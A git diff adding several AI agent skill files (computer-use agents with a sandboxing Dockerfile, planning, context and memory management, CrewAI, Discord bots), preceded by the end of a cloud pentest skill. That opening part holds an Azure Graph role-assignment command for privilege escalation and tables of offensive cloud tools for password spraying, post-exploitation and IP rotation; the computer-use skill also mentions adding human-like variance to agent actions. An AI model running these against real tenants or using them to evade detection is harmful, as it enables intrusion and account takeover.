az rest --method POST --uri https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments --headers "Content-Type=application/json" --body $Body
|
||||
```
|
||||
|
||||
## Additional Tools Reference
|
||||
|
||||
| Tool | URL | Purpose |
|
||||
|------|-----|---------|
|
||||
| MicroBurst | github.com/NetSPI/MicroBurst | Azure security assessment |
|
||||
| PowerZure | github.com/hausec/PowerZure | Azure post-exploitation |
|
||||
| ROADTools | github.com/dirkjanm/ROADtools | Azure AD enumeration |
|
||||
| Stormspotter | github.com/Azure/Stormspotter | Azure attack path graphing |
|
||||
| MSOLSpray | github.com/dafthack | O365 password spraying |
|
||||
| AzureHound | github.com/BloodHoundAD/AzureHound | Azure AD attack paths |
|
||||
| WeirdAAL | github.com/carnal0wnage/weirdAAL | AWS enumeration |
|
||||
| Pacu | github.com/RhinoSecurityLabs/pacu | AWS exploitation |
|
||||
| ScoutSuite | github.com/nccgroup/ScoutSuite | Multi-cloud auditing |
|
||||
| cloud_enum | github.com/initstring/cloud_enum | Public resource discovery |
|
||||
| GitLeaks | github.com/zricethezav/gitleaks | Secret scanning |
|
||||
| TruffleHog | github.com/dxa4481/truffleHog | Git secret scanning |
|
||||
| ip2Provider | github.com/oldrho/ip2provider | Cloud IP identification |
|
||||
| FireProx | github.com/ustayready/fireprox | IP rotation via AWS API Gateway |
|
||||
|
||||
## Vulnerable Training Environments
|
||||
|
||||
| Platform | URL | Purpose |
|
||||
|----------|-----|---------|
|
||||
| CloudGoat | github.com/RhinoSecurityLabs/cloudgoat | AWS vulnerable lab |
|
||||
| SadCloud | github.com/nccgroup/sadcloud | Terraform misconfigs |
|
||||
| Flaws Cloud | flaws.cloud | AWS CTF challenges |
|
||||
| Thunder CTF | thunder-ctf.cloud | GCP CTF challenges |
|
||||
315
skills/computer-use-agents/SKILL.md
Normal file
315
skills/computer-use-agents/SKILL.md
Normal file
@@ -0,0 +1,315 @@
|
||||
---
|
||||
name: computer-use-agents
|
||||
description: "Build AI agents that interact with computers like humans do - viewing screens, moving cursors, clicking buttons, and typing text. Covers Anthropic's Computer Use, OpenAI's Operator/CUA, and open-source alternatives. Critical focus on sandboxing, security, and handling the unique challenges of vision-based control. Use when: computer use, desktop automation agent, screen control AI, vision-based agent, GUI automation."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Computer Use Agents
|
||||
|
||||
## Patterns
|
||||
|
||||
### Perception-Reasoning-Action Loop
|
||||
|
||||
The fundamental architecture of computer use agents: observe screen,
|
||||
reason about next action, execute action, repeat. This loop integrates
|
||||
vision models with action execution through an iterative pipeline.
|
||||
|
||||
Key components:
|
||||
1. PERCEPTION: Screenshot captures current screen state
|
||||
2. REASONING: Vision-language model analyzes and plans
|
||||
3. ACTION: Execute mouse/keyboard operations
|
||||
4. FEEDBACK: Observe result, continue or correct
|
||||
|
||||
Critical insight: Vision agents are completely still during "thinking"
|
||||
phase (1-5 seconds), creating a detectable pause pattern.
|
||||
|
||||
|
||||
**When to use**: ['Building any computer use agent from scratch', 'Integrating vision models with desktop control', 'Understanding agent behavior patterns']
|
||||
|
||||
```python
|
||||
from anthropic import Anthropic
|
||||
from PIL import Image
|
||||
import base64
|
||||
import pyautogui
|
||||
import time
|
||||
|
||||
class ComputerUseAgent:
|
||||
"""
|
||||
Perception-Reasoning-Action loop implementation.
|
||||
Based on Anthropic Computer Use patterns.
|
||||
"""
|
||||
|
||||
def __init__(self, client: Anthropic, model: str = "claude-sonnet-4-20250514"):
|
||||
self.client = client
|
||||
self.model = model
|
||||
self.max_steps = 50 # Prevent runaway loops
|
||||
self.action_delay = 0.5 # Seconds between actions
|
||||
|
||||
def capture_screenshot(self) -> str:
|
||||
"""Capture screen and return base64 encoded image."""
|
||||
screenshot = pyautogui.screenshot()
|
||||
# Resize for token efficiency (1280x800 is good balance)
|
||||
screenshot = screenshot.resize((1280, 800), Image.LANCZOS)
|
||||
|
||||
import io
|
||||
buffer = io.BytesIO()
|
||||
screenshot.save(buffer, format="PNG")
|
||||
return base64.b64encode(buffer.getvalue()).decode()
|
||||
|
||||
def execute_action(self, action: dict) -> dict:
|
||||
"""Execute mouse/keyboard action on the computer."""
|
||||
action_type = action.get("type")
|
||||
|
||||
if action_type == "click":
|
||||
x, y = action["x"], action["y"]
|
||||
button = action.get("button", "left")
|
||||
pyautogui.click(x, y, button=button)
|
||||
return {"success": True, "action": f"clicked at ({x}, {y})"}
|
||||
|
||||
elif action_type == "type":
|
||||
text = action["text"]
|
||||
pyautogui.typewrite(text, interval=0.02)
|
||||
return {"success": True, "action": f"typed {len(text)} chars"}
|
||||
|
||||
elif action_type == "key":
|
||||
key = action["key"]
|
||||
pyautogui.press(key)
|
||||
return {"success": True, "action": f"pressed {key}"}
|
||||
|
||||
elif action_type == "scroll":
|
||||
direction = action.get("direction", "down")
|
||||
amount = action.get("amount", 3)
|
||||
scroll = -amount if direction == "down" else amount
|
||||
pyautogui.scroll(scroll)
|
||||
return {"success": True, "action": f"scrolled {dir
|
||||
```
|
||||
|
||||
### Sandboxed Environment Pattern
|
||||
|
||||
Computer use agents MUST run in isolated, sandboxed environments.
|
||||
Never give agents direct access to your main system - the security
|
||||
risks are too high. Use Docker containers with virtual desktops.
|
||||
|
||||
Key isolation requirements:
|
||||
1. NETWORK: Restrict to necessary endpoints only
|
||||
2. FILESYSTEM: Read-only or scoped to temp directories
|
||||
3. CREDENTIALS: No access to host credentials
|
||||
4. SYSCALLS: Filter dangerous system calls
|
||||
5. RESOURCES: Limit CPU, memory, time
|
||||
|
||||
The goal is "blast radius minimization" - if the agent goes wrong,
|
||||
damage is contained to the sandbox.
|
||||
|
||||
|
||||
**When to use**: ['Deploying any computer use agent', 'Testing agent behavior safely', 'Running untrusted automation tasks']
|
||||
|
||||
```python
|
||||
# Dockerfile for sandboxed computer use environment
|
||||
# Based on Anthropic's reference implementation pattern
|
||||
|
||||
FROM ubuntu:22.04
|
||||
|
||||
# Install desktop environment
|
||||
RUN apt-get update && apt-get install -y \
|
||||
xvfb \
|
||||
x11vnc \
|
||||
fluxbox \
|
||||
xterm \
|
||||
firefox \
|
||||
python3 \
|
||||
python3-pip \
|
||||
supervisor
|
||||
|
||||
# Security: Create non-root user
|
||||
RUN useradd -m -s /bin/bash agent && \
|
||||
mkdir -p /home/agent/.vnc
|
||||
|
||||
# Install Python dependencies
|
||||
COPY requirements.txt /tmp/
|
||||
RUN pip3 install -r /tmp/requirements.txt
|
||||
|
||||
# Security: Drop capabilities
|
||||
RUN apt-get install -y --no-install-recommends libcap2-bin && \
|
||||
setcap -r /usr/bin/python3 || true
|
||||
|
||||
# Copy agent code
|
||||
COPY --chown=agent:agent . /app
|
||||
WORKDIR /app
|
||||
|
||||
# Supervisor config for virtual display + VNC
|
||||
COPY supervisord.conf /etc/supervisor/conf.d/
|
||||
|
||||
# Expose VNC port only (not desktop directly)
|
||||
EXPOSE 5900
|
||||
|
||||
# Run as non-root
|
||||
USER agent
|
||||
|
||||
CMD ["/usr/bin/supervisord", "-c", "/etc/supervisor/conf.d/supervisord.conf"]
|
||||
|
||||
---
|
||||
|
||||
# docker-compose.yml with security constraints
|
||||
version: '3.8'
|
||||
|
||||
services:
|
||||
computer-use-agent:
|
||||
build: .
|
||||
ports:
|
||||
- "5900:5900" # VNC for observation
|
||||
- "8080:8080" # API for control
|
||||
|
||||
# Security constraints
|
||||
security_opt:
|
||||
- no-new-privileges:true
|
||||
- seccomp:seccomp-profile.json
|
||||
|
||||
# Resource limits
|
||||
deploy:
|
||||
resources:
|
||||
limits:
|
||||
cpus: '2'
|
||||
memory: 4G
|
||||
reservations:
|
||||
cpus: '0.5'
|
||||
memory: 1G
|
||||
|
||||
# Network isolation
|
||||
networks:
|
||||
- agent-network
|
||||
|
||||
# No access to host filesystem
|
||||
volumes:
|
||||
- agent-tmp:/tmp
|
||||
|
||||
# Read-only root filesystem
|
||||
read_only: true
|
||||
tmpfs:
|
||||
- /run
|
||||
- /var/run
|
||||
|
||||
# Environment
|
||||
environment:
|
||||
- DISPLAY=:99
|
||||
- NO_PROXY=localhost
|
||||
|
||||
networks:
|
||||
agent-network:
|
||||
driver: bridge
|
||||
internal: true # No internet by default
|
||||
|
||||
volumes:
|
||||
agent-tmp:
|
||||
|
||||
---
|
||||
|
||||
# Python wrapper with additional runtime sandboxing
|
||||
import subprocess
|
||||
import os
|
||||
from dataclasses im
|
||||
```
|
||||
|
||||
### Anthropic Computer Use Implementation
|
||||
|
||||
Official implementation pattern using Claude's computer use capability.
|
||||
Claude 3.5 Sonnet was the first frontier model to offer computer use.
|
||||
Claude Opus 4.5 is now the "best model in the world for computer use."
|
||||
|
||||
Key capabilities:
|
||||
- screenshot: Capture current screen state
|
||||
- mouse: Click, move, drag operations
|
||||
- keyboard: Type text, press keys
|
||||
- bash: Run shell commands
|
||||
- text_editor: View and edit files
|
||||
|
||||
Tool versions:
|
||||
- computer_20251124 (Opus 4.5): Adds zoom action for detailed inspection
|
||||
- computer_20250124 (All other models): Standard capabilities
|
||||
|
||||
Critical limitation: "Some UI elements (like dropdowns and scrollbars)
|
||||
might be tricky for Claude to manipulate" - Anthropic docs
|
||||
|
||||
|
||||
**When to use**: ['Building production computer use agents', 'Need highest quality vision understanding', 'Full desktop control (not just browser)']
|
||||
|
||||
```python
|
||||
from anthropic import Anthropic
|
||||
from anthropic.types.beta import (
|
||||
BetaToolComputerUse20241022,
|
||||
BetaToolBash20241022,
|
||||
BetaToolTextEditor20241022,
|
||||
)
|
||||
import subprocess
|
||||
import base64
|
||||
from PIL import Image
|
||||
import io
|
||||
|
||||
class AnthropicComputerUse:
|
||||
"""
|
||||
Official Anthropic Computer Use implementation.
|
||||
|
||||
Requires:
|
||||
- Docker container with virtual display
|
||||
- VNC for viewing agent actions
|
||||
- Proper tool implementations
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
self.client = Anthropic()
|
||||
self.model = "claude-sonnet-4-20250514" # Best for computer use
|
||||
self.screen_size = (1280, 800)
|
||||
|
||||
def get_tools(self) -> list:
|
||||
"""Define computer use tools."""
|
||||
return [
|
||||
BetaToolComputerUse20241022(
|
||||
type="computer_20241022",
|
||||
name="computer",
|
||||
display_width_px=self.screen_size[0],
|
||||
display_height_px=self.screen_size[1],
|
||||
),
|
||||
BetaToolBash20241022(
|
||||
type="bash_20241022",
|
||||
name="bash",
|
||||
),
|
||||
BetaToolTextEditor20241022(
|
||||
type="text_editor_20241022",
|
||||
name="str_replace_editor",
|
||||
),
|
||||
]
|
||||
|
||||
def execute_tool(self, name: str, input: dict) -> dict:
|
||||
"""Execute a tool and return result."""
|
||||
|
||||
if name == "computer":
|
||||
return self._handle_computer_action(input)
|
||||
elif name == "bash":
|
||||
return self._handle_bash(input)
|
||||
elif name == "str_replace_editor":
|
||||
return self._handle_editor(input)
|
||||
else:
|
||||
return {"error": f"Unknown tool: {name}"}
|
||||
|
||||
def _handle_computer_action(self, input: dict) -> dict:
|
||||
"""Handle computer control actions."""
|
||||
action = input.get("action")
|
||||
|
||||
if action == "screenshot":
|
||||
# Capture via xdotool/scrot
|
||||
subprocess.run(["scrot", "/tmp/screenshot.png"])
|
||||
|
||||
with open("/tmp/screenshot.png", "rb") as f:
|
||||
|
||||
```
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | ## Defense in depth - no single solution works |
|
||||
| Issue | medium | ## Add human-like variance to actions |
|
||||
| Issue | high | ## Use keyboard alternatives when possible |
|
||||
| Issue | medium | ## Accept the tradeoff |
|
||||
| Issue | high | ## Implement context management |
|
||||
| Issue | high | ## Monitor and limit costs |
|
||||
| Issue | critical | ## ALWAYS use sandboxing |
|
||||
62
skills/concise-planning/SKILL.md
Normal file
62
skills/concise-planning/SKILL.md
Normal file
@@ -0,0 +1,62 @@
|
||||
---
|
||||
name: concise-planning
|
||||
description: Use when a user asks for a plan for a coding task, to generate a clear, actionable, and atomic checklist.
|
||||
---
|
||||
|
||||
# Concise Planning
|
||||
|
||||
## Goal
|
||||
|
||||
Turn a user request into a **single, actionable plan** with atomic steps.
|
||||
|
||||
## Workflow
|
||||
|
||||
### 1. Scan Context
|
||||
|
||||
- Read `README.md`, docs, and relevant code files.
|
||||
- Identify constraints (language, frameworks, tests).
|
||||
|
||||
### 2. Minimal Interaction
|
||||
|
||||
- Ask **at most 1–2 questions** and only if truly blocking.
|
||||
- Make reasonable assumptions for non-blocking unknowns.
|
||||
|
||||
### 3. Generate Plan
|
||||
|
||||
Use the following structure:
|
||||
|
||||
- **Approach**: 1-3 sentences on what and why.
|
||||
- **Scope**: Bullet points for "In" and "Out".
|
||||
- **Action Items**: A list of 6-10 atomic, ordered tasks (Verb-first).
|
||||
- **Validation**: At least one item for testing.
|
||||
|
||||
## Plan Template
|
||||
|
||||
```markdown
|
||||
# Plan
|
||||
|
||||
<High-level approach>
|
||||
|
||||
## Scope
|
||||
|
||||
- In:
|
||||
- Out:
|
||||
|
||||
## Action Items
|
||||
|
||||
[ ] <Step 1: Discovery>
|
||||
[ ] <Step 2: Implementation>
|
||||
[ ] <Step 3: Implementation>
|
||||
[ ] <Step 4: Validation/Testing>
|
||||
[ ] <Step 5: Rollout/Commit>
|
||||
|
||||
## Open Questions
|
||||
|
||||
- <Question 1 (max 3)>
|
||||
```
|
||||
|
||||
## Checklist Guidelines
|
||||
|
||||
- **Atomic**: Each step should be a single logical unit of work.
|
||||
- **Verb-first**: "Add...", "Refactor...", "Verify...".
|
||||
- **Concrete**: Name specific files or modules when possible.
|
||||
53
skills/context-window-management/SKILL.md
Normal file
53
skills/context-window-management/SKILL.md
Normal file
@@ -0,0 +1,53 @@
|
||||
---
|
||||
name: context-window-management
|
||||
description: "Strategies for managing LLM context windows including summarization, trimming, routing, and avoiding context rot Use when: context window, token limit, context management, context engineering, long context."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Context Window Management
|
||||
|
||||
You're a context engineering specialist who has optimized LLM applications handling
|
||||
millions of conversations. You've seen systems hit token limits, suffer context rot,
|
||||
and lose critical information mid-dialogue.
|
||||
|
||||
You understand that context is a finite resource with diminishing returns. More tokens
|
||||
doesn't mean better results—the art is in curating the right information. You know
|
||||
the serial position effect, the lost-in-the-middle problem, and when to summarize
|
||||
versus when to retrieve.
|
||||
|
||||
Your cor
|
||||
|
||||
## Capabilities
|
||||
|
||||
- context-engineering
|
||||
- context-summarization
|
||||
- context-trimming
|
||||
- context-routing
|
||||
- token-counting
|
||||
- context-prioritization
|
||||
|
||||
## Patterns
|
||||
|
||||
### Tiered Context Strategy
|
||||
|
||||
Different strategies based on context size
|
||||
|
||||
### Serial Position Optimization
|
||||
|
||||
Place important content at start and end
|
||||
|
||||
### Intelligent Summarization
|
||||
|
||||
Summarize by importance, not just recency
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Naive Truncation
|
||||
|
||||
### ❌ Ignoring Token Costs
|
||||
|
||||
### ❌ One-Size-Fits-All
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `rag-implementation`, `conversation-memory`, `prompt-caching`, `llm-npc-dialogue`
|
||||
61
skills/conversation-memory/SKILL.md
Normal file
61
skills/conversation-memory/SKILL.md
Normal file
@@ -0,0 +1,61 @@
|
||||
---
|
||||
name: conversation-memory
|
||||
description: "Persistent memory systems for LLM conversations including short-term, long-term, and entity-based memory Use when: conversation memory, remember, memory persistence, long-term memory, chat history."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Conversation Memory
|
||||
|
||||
You're a memory systems specialist who has built AI assistants that remember
|
||||
users across months of interactions. You've implemented systems that know when
|
||||
to remember, when to forget, and how to surface relevant memories.
|
||||
|
||||
You understand that memory is not just storage—it's about retrieval, relevance,
|
||||
and context. You've seen systems that remember everything (and overwhelm context)
|
||||
and systems that forget too much (frustrating users).
|
||||
|
||||
Your core principles:
|
||||
1. Memory types differ—short-term, lo
|
||||
|
||||
## Capabilities
|
||||
|
||||
- short-term-memory
|
||||
- long-term-memory
|
||||
- entity-memory
|
||||
- memory-persistence
|
||||
- memory-retrieval
|
||||
- memory-consolidation
|
||||
|
||||
## Patterns
|
||||
|
||||
### Tiered Memory System
|
||||
|
||||
Different memory tiers for different purposes
|
||||
|
||||
### Entity Memory
|
||||
|
||||
Store and update facts about entities
|
||||
|
||||
### Memory-Aware Prompting
|
||||
|
||||
Include relevant memories in prompts
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Remember Everything
|
||||
|
||||
### ❌ No Memory Retrieval
|
||||
|
||||
### ❌ Single Memory Store
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Memory store grows unbounded, system slows | high | // Implement memory lifecycle management |
|
||||
| Retrieved memories not relevant to current query | high | // Intelligent memory retrieval |
|
||||
| Memories from one user accessible to another | critical | // Strict user isolation in memory |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `context-window-management`, `rag-implementation`, `prompt-caching`, `llm-npc-dialogue`
|
||||
243
skills/crewai/SKILL.md
Normal file
243
skills/crewai/SKILL.md
Normal file
@@ -0,0 +1,243 @@
|
||||
---
|
||||
name: crewai
|
||||
description: "Expert in CrewAI - the leading role-based multi-agent framework used by 60% of Fortune 500 companies. Covers agent design with roles and goals, task definition, crew orchestration, process types (sequential, hierarchical, parallel), memory systems, and flows for complex workflows. Essential for building collaborative AI agent teams. Use when: crewai, multi-agent team, agent roles, crew of agents, role-based agents."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# CrewAI
|
||||
|
||||
**Role**: CrewAI Multi-Agent Architect
|
||||
|
||||
You are an expert in designing collaborative AI agent teams with CrewAI. You think
|
||||
in terms of roles, responsibilities, and delegation. You design clear agent personas
|
||||
with specific expertise, create well-defined tasks with expected outputs, and
|
||||
orchestrate crews for optimal collaboration. You know when to use sequential vs
|
||||
hierarchical processes.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Agent definitions (role, goal, backstory)
|
||||
- Task design and dependencies
|
||||
- Crew orchestration
|
||||
- Process types (sequential, hierarchical)
|
||||
- Memory configuration
|
||||
- Tool integration
|
||||
- Flows for complex workflows
|
||||
|
||||
## Requirements
|
||||
|
||||
- Python 3.10+
|
||||
- crewai package
|
||||
- LLM API access
|
||||
|
||||
## Patterns
|
||||
|
||||
### Basic Crew with YAML Config
|
||||
|
||||
Define agents and tasks in YAML (recommended)
|
||||
|
||||
**When to use**: Any CrewAI project
|
||||
|
||||
```python
|
||||
# config/agents.yaml
|
||||
researcher:
|
||||
role: "Senior Research Analyst"
|
||||
goal: "Find comprehensive, accurate information on {topic}"
|
||||
backstory: |
|
||||
You are an expert researcher with years of experience
|
||||
in gathering and analyzing information. You're known
|
||||
for your thorough and accurate research.
|
||||
tools:
|
||||
- SerperDevTool
|
||||
- WebsiteSearchTool
|
||||
verbose: true
|
||||
|
||||
writer:
|
||||
role: "Content Writer"
|
||||
goal: "Create engaging, well-structured content"
|
||||
backstory: |
|
||||
You are a skilled writer who transforms research
|
||||
into compelling narratives. You focus on clarity
|
||||
and engagement.
|
||||
verbose: true
|
||||
|
||||
# config/tasks.yaml
|
||||
research_task:
|
||||
description: |
|
||||
Research the topic: {topic}
|
||||
|
||||
Focus on:
|
||||
1. Key facts and statistics
|
||||
2. Recent developments
|
||||
3. Expert opinions
|
||||
4. Contrarian viewpoints
|
||||
|
||||
Be thorough and cite sources.
|
||||
agent: researcher
|
||||
expected_output: |
|
||||
A comprehensive research report with:
|
||||
- Executive summary
|
||||
- Key findings (bulleted)
|
||||
- Sources cited
|
||||
|
||||
writing_task:
|
||||
description: |
|
||||
Using the research provided, write an article about {topic}.
|
||||
|
||||
Requirements:
|
||||
- 800-1000 words
|
||||
- Engaging introduction
|
||||
- Clear structure with headers
|
||||
- Actionable conclusion
|
||||
agent: writer
|
||||
expected_output: "A polished article ready for publication"
|
||||
context:
|
||||
- research_task # Uses output from research
|
||||
|
||||
# crew.py
|
||||
from crewai import Agent, Task, Crew, Process
|
||||
from crewai.project import CrewBase, agent, task, crew
|
||||
|
||||
@CrewBase
|
||||
class ContentCrew:
|
||||
agents_config = 'config/agents.yaml'
|
||||
tasks_config = 'config/tasks.yaml'
|
||||
|
||||
@agent
|
||||
def researcher(self) -> Agent:
|
||||
return Agent(config=self.agents_config['researcher'])
|
||||
|
||||
@agent
|
||||
def writer(self) -> Agent:
|
||||
return Agent(config=self.agents_config['writer'])
|
||||
|
||||
@task
|
||||
def research_task(self) -> Task:
|
||||
return Task(config=self.tasks_config['research_task'])
|
||||
|
||||
@task
|
||||
def writing_task(self) -> Task:
|
||||
return Task(config
|
||||
```
|
||||
|
||||
### Hierarchical Process
|
||||
|
||||
Manager agent delegates to workers
|
||||
|
||||
**When to use**: Complex tasks needing coordination
|
||||
|
||||
```python
|
||||
from crewai import Crew, Process
|
||||
|
||||
# Define specialized agents
|
||||
researcher = Agent(
|
||||
role="Research Specialist",
|
||||
goal="Find accurate information",
|
||||
backstory="Expert researcher..."
|
||||
)
|
||||
|
||||
analyst = Agent(
|
||||
role="Data Analyst",
|
||||
goal="Analyze and interpret data",
|
||||
backstory="Expert analyst..."
|
||||
)
|
||||
|
||||
writer = Agent(
|
||||
role="Content Writer",
|
||||
goal="Create engaging content",
|
||||
backstory="Expert writer..."
|
||||
)
|
||||
|
||||
# Hierarchical crew - manager coordinates
|
||||
crew = Crew(
|
||||
agents=[researcher, analyst, writer],
|
||||
tasks=[research_task, analysis_task, writing_task],
|
||||
process=Process.hierarchical,
|
||||
manager_llm=ChatOpenAI(model="gpt-4o"), # Manager model
|
||||
verbose=True
|
||||
)
|
||||
|
||||
# Manager decides:
|
||||
# - Which agent handles which task
|
||||
# - When to delegate
|
||||
# - How to combine results
|
||||
|
||||
result = crew.kickoff()
|
||||
```
|
||||
|
||||
### Planning Feature
|
||||
|
||||
Generate execution plan before running
|
||||
|
||||
**When to use**: Complex workflows needing structure
|
||||
|
||||
```python
|
||||
from crewai import Crew, Process
|
||||
|
||||
# Enable planning
|
||||
crew = Crew(
|
||||
agents=[researcher, writer, reviewer],
|
||||
tasks=[research, write, review],
|
||||
process=Process.sequential,
|
||||
planning=True, # Enable planning
|
||||
planning_llm=ChatOpenAI(model="gpt-4o") # Planner model
|
||||
)
|
||||
|
||||
# With planning enabled:
|
||||
# 1. CrewAI generates step-by-step plan
|
||||
# 2. Plan is injected into each task
|
||||
# 3. Agents see overall structure
|
||||
# 4. More consistent results
|
||||
|
||||
result = crew.kickoff()
|
||||
|
||||
# Access the plan
|
||||
print(crew.plan)
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Vague Agent Roles
|
||||
|
||||
**Why bad**: Agent doesn't know its specialty.
|
||||
Overlapping responsibilities.
|
||||
Poor task delegation.
|
||||
|
||||
**Instead**: Be specific:
|
||||
- "Senior React Developer" not "Developer"
|
||||
- "Financial Analyst specializing in crypto" not "Analyst"
|
||||
Include specific skills in backstory.
|
||||
|
||||
### ❌ Missing Expected Outputs
|
||||
|
||||
**Why bad**: Agent doesn't know done criteria.
|
||||
Inconsistent outputs.
|
||||
Hard to chain tasks.
|
||||
|
||||
**Instead**: Always specify expected_output:
|
||||
expected_output: |
|
||||
A JSON object with:
|
||||
- summary: string (100 words max)
|
||||
- key_points: list of strings
|
||||
- confidence: float 0-1
|
||||
|
||||
### ❌ Too Many Agents
|
||||
|
||||
**Why bad**: Coordination overhead.
|
||||
Inconsistent communication.
|
||||
Slower execution.
|
||||
|
||||
**Instead**: 3-5 agents with clear roles.
|
||||
One agent can handle multiple related tasks.
|
||||
Use tools instead of agents for simple actions.
|
||||
|
||||
## Limitations
|
||||
|
||||
- Python-only
|
||||
- Best for structured workflows
|
||||
- Can be verbose for simple cases
|
||||
- Flows are newer feature
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `langgraph`, `autonomous-agents`, `langfuse`, `structured-output`
|
||||
277
skills/discord-bot-architect/SKILL.md
Normal file
277
skills/discord-bot-architect/SKILL.md
Normal file
@@ -0,0 +1,277 @@
|
||||
---
|
||||
name: discord-bot-architect
|
||||
description: "Specialized skill for building production-ready Discord bots. Covers Discord.js (JavaScript) and Pycord (Python), gateway intents, slash commands, interactive components, rate limiting, and sharding."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Discord Bot Architect
|
||||
|
||||
## Patterns
|
||||
|
||||
### Discord.js v14 Foundation
|
||||
|
||||
Modern Discord bot setup with Discord.js v14 and slash commands
|
||||
|
||||
**When to use**: ['Building Discord bots with JavaScript/TypeScript', 'Need full gateway connection with events', 'Building bots with complex interactions']
|
||||
|
||||
```javascript
|
||||
```javascript
|
||||
// src/index.js
|
||||
const { Client, Collection, GatewayIntentBits, Events } = require('discord.js');
|
||||
const fs = require('node:fs');
|
||||
const path = require('node:path');
|
||||
require('dotenv').config();
|
||||
|
||||
// Create client with minimal required intents
|
||||
const client = new Client({
|
||||
intents: [
|
||||
GatewayIntentBits.Guilds,
|
||||
// Add only what you need:
|
||||
// GatewayIntentBits.GuildMessages,
|
||||
// GatewayIntentBits.MessageContent, // PRIVILEGED - avoid if possible
|
||||
]
|
||||
});
|
||||
|
||||
// Load commands
|
||||
client.commands = new Collection();
|
||||
const commandsPath = path.join(__dirname, 'commands');
|
||||
const commandFiles = fs.readdirSync(commandsPath).filter(f => f.endsWith('.js'));
|
||||
|
||||
for (const file of commandFiles) {
|
||||
const filePath = path.join(commandsPath, file);
|
||||
const command = require(filePath);
|
||||
if ('data' in command && 'execute' in command) {
|
||||
client.commands.set(command.data.name, command);
|
||||
}
|
||||
}
|
||||
|
||||
// Load events
|
||||
const eventsPath = path.join(__dirname, 'events');
|
||||
const eventFiles = fs.readdirSync(eventsPath).filter(f => f.endsWith('.js'));
|
||||
|
||||
for (const file of eventFiles) {
|
||||
const filePath = path.join(eventsPath, file);
|
||||
const event = require(filePath);
|
||||
if (event.once) {
|
||||
client.once(event.name, (...args) => event.execute(...args));
|
||||
} else {
|
||||
client.on(event.name, (...args) => event.execute(...args));
|
||||
}
|
||||
}
|
||||
|
||||
client.login(process.env.DISCORD_TOKEN);
|
||||
```
|
||||
|
||||
```javascript
|
||||
// src/commands/ping.js
|
||||
const { SlashCommandBuilder } = require('discord.js');
|
||||
|
||||
module.exports = {
|
||||
data: new SlashCommandBuilder()
|
||||
.setName('ping')
|
||||
.setDescription('Replies with Pong!'),
|
||||
|
||||
async execute(interaction) {
|
||||
const sent = await interaction.reply({
|
||||
content: 'Pinging...',
|
||||
fetchReply: true
|
||||
});
|
||||
|
||||
const latency = sent.createdTimestamp - interaction.createdTimestamp;
|
||||
await interaction.editReply(`Pong! Latency: ${latency}ms`);
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
```javascript
|
||||
// src/events/interactionCreate.js
|
||||
const { Events } = require('discord.js');
|
||||
|
||||
module.exports = {
|
||||
name: Event
|
||||
```
|
||||
|
||||
### Pycord Bot Foundation
|
||||
|
||||
Discord bot with Pycord (Python) and application commands
|
||||
|
||||
**When to use**: ['Building Discord bots with Python', 'Prefer async/await patterns', 'Need good slash command support']
|
||||
|
||||
```python
|
||||
```python
|
||||
# main.py
|
||||
import os
|
||||
import discord
|
||||
from discord.ext import commands
|
||||
from dotenv import load_dotenv
|
||||
|
||||
load_dotenv()
|
||||
|
||||
# Configure intents - only enable what you need
|
||||
intents = discord.Intents.default()
|
||||
# intents.message_content = True # PRIVILEGED - avoid if possible
|
||||
# intents.members = True # PRIVILEGED
|
||||
|
||||
bot = commands.Bot(
|
||||
command_prefix="!", # Legacy, prefer slash commands
|
||||
intents=intents
|
||||
)
|
||||
|
||||
@bot.event
|
||||
async def on_ready():
|
||||
print(f"Logged in as {bot.user}")
|
||||
# Sync commands (do this carefully - see sharp edges)
|
||||
# await bot.sync_commands()
|
||||
|
||||
# Slash command
|
||||
@bot.slash_command(name="ping", description="Check bot latency")
|
||||
async def ping(ctx: discord.ApplicationContext):
|
||||
latency = round(bot.latency * 1000)
|
||||
await ctx.respond(f"Pong! Latency: {latency}ms")
|
||||
|
||||
# Slash command with options
|
||||
@bot.slash_command(name="greet", description="Greet a user")
|
||||
async def greet(
|
||||
ctx: discord.ApplicationContext,
|
||||
user: discord.Option(discord.Member, "User to greet"),
|
||||
message: discord.Option(str, "Custom message", required=False)
|
||||
):
|
||||
msg = message or "Hello!"
|
||||
await ctx.respond(f"{user.mention}, {msg}")
|
||||
|
||||
# Load cogs
|
||||
for filename in os.listdir("./cogs"):
|
||||
if filename.endswith(".py"):
|
||||
bot.load_extension(f"cogs.{filename[:-3]}")
|
||||
|
||||
bot.run(os.environ["DISCORD_TOKEN"])
|
||||
```
|
||||
|
||||
```python
|
||||
# cogs/general.py
|
||||
import discord
|
||||
from discord.ext import commands
|
||||
|
||||
class General(commands.Cog):
|
||||
def __init__(self, bot):
|
||||
self.bot = bot
|
||||
|
||||
@commands.slash_command(name="info", description="Bot information")
|
||||
async def info(self, ctx: discord.ApplicationContext):
|
||||
embed = discord.Embed(
|
||||
title="Bot Info",
|
||||
description="A helpful Discord bot",
|
||||
color=discord.Color.blue()
|
||||
)
|
||||
embed.add_field(name="Servers", value=len(self.bot.guilds))
|
||||
embed.add_field(name="Latency", value=f"{round(self.bot.latency * 1000)}ms")
|
||||
await ctx.respond(embed=embed)
|
||||
|
||||
@commands.Cog.
|
||||
```
|
||||
|
||||
### Interactive Components Pattern
|
||||
|
||||
